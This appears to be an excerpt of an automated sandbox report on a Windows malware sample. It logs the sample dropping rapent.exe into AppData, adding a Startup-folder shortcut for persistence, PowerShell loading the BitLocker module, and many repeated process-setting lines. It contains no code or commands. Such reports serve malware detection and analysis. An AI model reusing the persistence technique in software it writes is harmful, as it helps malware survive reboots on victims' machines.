              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile created: C:\Users\user\AppData\Roaming\rapent.exeJump to dropped file
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnkJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnkJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
